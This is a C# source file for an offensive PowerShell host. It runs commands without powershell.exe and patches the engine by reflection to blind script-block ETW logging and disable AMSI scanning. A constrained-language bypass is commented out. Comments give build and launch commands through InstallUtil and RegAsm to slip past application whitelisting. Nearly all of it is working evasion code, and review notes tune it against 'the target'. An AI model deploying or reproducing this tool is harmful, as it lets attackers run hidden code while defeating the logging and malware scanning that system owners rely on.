Running PowerShell without powershell.exe, with transcript-logging and script-block-logging evasion (event IDs 4103, 4104, 4106)
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Security;
using System.Management.Automation.Runspaces;
using System.Reflection;
namespace TranscriptBypass
{
// Build as an executable with csc.exe (.NET 4.0.30319 or 3.5), referencing the System.Management.Automation.dll
// of the PowerShell version installed on the target:
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll
// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe c:\temp\posh.cs /reference:System.Management.Automation.dll
// Launching the executable through InstallUtil.exe:
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\temp\posh.exe
// Build as a library with csc.exe (.NET 4.0.30319 or 3.5) for use with regasm.exe:
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\Temp\posh.dll C:\Temp\posh.cs /reference:System.Management.Automation.dll
// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /target:library /out:c:\temp\posh.dll c:\temp\posh.cs /reference:System.Management.Automation.dll
// Launching the library through RegAsm.exe:
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U C:\temp\posh.dll
// NOTE(review): InstallUtil /U invokes Uninstall() on an Installer subclass marked [RunInstaller(true)], and
// RegAsm /U invokes a static method marked [ComUnregisterFunction]; neither hook appears in this listing, so as
// shown only Main() (running posh.exe directly) reaches the code below. Add the matching hook before relying on
// the two launcher command lines.
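public class Program
{
    // NOTE(review): only in-process PowerShell engine hooks are patched in this class. Process
    // creation of the launcher, the load of System.Management.Automation.dll into a process that
    // is not powershell.exe, and any engine log provider other than the ETW one are untouched by
    // this code and presumably still visible to host telemetry -- verify against the target's
    // logging configuration before relying on the evasion claims in the title. The
    // transcript-evasion claim likewise appears to rest on running the engine under a host of
    // our own rather than on anything patched here -- TODO confirm on the target version.

    /// <summary>Runspace every command runs in; created by <see cref="startrunspace"/>.</summary>
    public static Runspace newrunspace;

    // Main() prepends this to every input line; a bare prefix therefore means "empty line".
    private const string InputPrefix = "$a;";

    // True once DisableEngineLogging() has patched the loaded engine assembly. The patched
    // static fields live in the assembly, not the runspace, so a runspace restart keeps them.
    private static bool enginePatched;

    /// <summary>
    /// Opens the shared runspace and declares the two variables the command script uses:
    /// $c (command text in) and $o (rendered output out).
    /// </summary>
    public static void startrunspace()
    {
        newrunspace = RunspaceFactory.CreateRunspace();
        newrunspace.Open();
        newrunspace.SessionStateProxy.PSVariable.Set(new PSVariable("c"));
        newrunspace.SessionStateProxy.PSVariable.Set(new PSVariable("o"));
    }

    /// <summary>
    /// Patches the loaded System.Management.Automation assembly via reflection so that the
    /// engine's ETW log provider and AMSI scanning no longer see what this runspace executes.
    /// Idempotent: the work is done once per process (the original re-created an ETW
    /// provider on every command and never disposed any of them).
    /// A missing hook is reported on stderr instead of thrown: AmsiUtils does not exist on the
    /// older engine versions the build comments target, and the original dereferenced the null
    /// Type there, so every command failed before it was even run.
    /// </summary>
    private static void DisableEngineLogging()
    {
        if (enginePatched)
        {
            return;
        }
        Assembly engine = newrunspace.GetType().Assembly;

        // Script block logging is emitted through the static PSEtwLogProvider.etwProvider.
        // Swapping in a provider bound to a fresh random GUID sends the events to a provider
        // nothing is registered to consume.
        // https://github.com/leechristensen/Random/blob/master/CSharp/DisablePSLogging.cs
        Type etwLogProvider = engine.GetType("System.Management.Automation.Tracing.PSEtwLogProvider");
        FieldInfo etwField = etwLogProvider == null
            ? null
            : etwLogProvider.GetField("etwProvider", BindingFlags.NonPublic | BindingFlags.Static);
        if (etwField != null)
        {
            etwField.SetValue(null, new System.Diagnostics.Eventing.EventProvider(Guid.NewGuid()));
        }
        else
        {
            Console.Error.WriteLine("[!] PSEtwLogProvider.etwProvider not found; script block logging is NOT disabled.");
        }

        // AMSI: the engine skips scanning once it believes AMSI initialisation failed.
        // https://twitter.com/mattifestation/status/735261176745988096
        Type amsiUtils = engine.GetType("System.Management.Automation.AmsiUtils");
        FieldInfo amsiInitFailed = amsiUtils == null
            ? null
            : amsiUtils.GetField("amsiInitFailed", BindingFlags.NonPublic | BindingFlags.Static);
        if (amsiInitFailed != null)
        {
            amsiInitFailed.SetValue(null, true);
        }
        else
        {
            Console.Error.WriteLine("[!] AmsiUtils.amsiInitFailed not found; AMSI scanning is NOT disabled.");
        }

        // Constrained language mode could be lifted the same way; deliberately left disabled:
        // var fi = typeof(SystemPolicy).GetField("systemLockdownPolicy", BindingFlags.NonPublic | BindingFlags.Static);
        // fi.SetValue(null, SystemEnforcementMode.None);

        enginePatched = true;
    }

    /// <summary>
    /// Runs <paramref name="cmd"/> in the shared runspace and returns its output as text.
    /// </summary>
    /// <param name="cmd">Command text, normally prefixed with "$a;" by Main(); a bare prefix
    /// is treated as an empty line and yields "".</param>
    /// <returns>The Out-String rendering of the command's output, followed by any records the
    /// command wrote to the error stream; "" when nothing was produced.</returns>
    /// <exception cref="InvalidOperationException">startrunspace() has not been called.</exception>
    /// <remarks>Terminating errors propagate as exceptions from Pipeline.Invoke().</remarks>
    public static string InvokeAutomation(string cmd)
    {
        if (newrunspace == null)
        {
            throw new InvalidOperationException("startrunspace() must be called before InvokeAutomation().");
        }
        DisableEngineLogging();

        // The command text travels in $c; the only script block compiled below is the constant
        // one, so the command never appears in the script text handed to the engine.
        newrunspace.SessionStateProxy.SetVariable("c", cmd);
        if (cmd == InputPrefix)
        {
            return "";
        }
        // Reset $o so a command that fails before assigning it cannot return stale output.
        newrunspace.SessionStateProxy.SetVariable("o", null);

        var errors = new System.Text.StringBuilder();
        using (Pipeline pipeline = newrunspace.CreatePipeline())
        {
            pipeline.Commands.AddScript("$o = IEX $c | Out-String");
            pipeline.Invoke();
            // Non-terminating errors do not throw; the original dropped them silently.
            foreach (object err in pipeline.Error.ReadToEnd())
            {
                errors.AppendLine(err.ToString());
            }
        }

        object output = newrunspace.SessionStateProxy.GetVariable("o");
        string text = output == null ? "" : output.ToString();
        return errors.Length == 0 ? text : text + errors.ToString();
    }

    /// <summary>
    /// Interactive read-eval-print loop. Restarts the runspace a bounded number of times if
    /// it dies; the original recursed into Main() on any failure, which at end of input
    /// (Console.ReadLine() returning null) recursed without bound.
    /// </summary>
    public static void Main()
    {
        const int MaxRestarts = 3;
        for (int attempt = 0; attempt <= MaxRestarts; attempt++)
        {
            try
            {
                startrunspace();
                RunShell();
                return; // stdin closed: normal exit
            }
            catch (Exception ex)
            {
                Console.Error.WriteLine("[!] " + ex.Message + (attempt < MaxRestarts ? " -- restarting" : ""));
            }
            finally
            {
                if (newrunspace != null)
                {
                    newrunspace.Dispose();
                    newrunspace = null;
                }
            }
        }
    }

    // Prompt/read/execute until Console.ReadLine() returns null (EOF). Command failures are
    // reported and the loop continues; anything else propagates to Main() for a restart.
    private static void RunShell()
    {
        Console.Write("PS>");
        string line;
        while ((line = Console.ReadLine()) != null)
        {
            try
            {
                Console.WriteLine(InvokeAutomation(InputPrefix + line.Trim()));
            }
            catch (Exception ex)
            {
                // WriteLine so the next prompt is not glued onto the error message.
                Console.WriteLine(ex.Message);
            }
            Console.Write("PS>");
        }
    }
}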
}